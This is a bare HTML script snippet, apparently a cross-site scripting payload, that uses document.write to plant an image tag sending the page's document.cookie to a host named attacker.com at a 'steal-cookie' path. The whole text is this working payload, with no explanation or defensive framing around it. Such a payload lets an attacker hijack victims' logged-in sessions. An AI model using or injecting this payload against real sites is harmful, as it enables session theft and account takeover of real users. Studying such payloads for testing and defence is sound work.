<script>
    document.write('<img src="http://attacker.com/steal-cookie?cookie=' + document.cookie + '" />');
</script>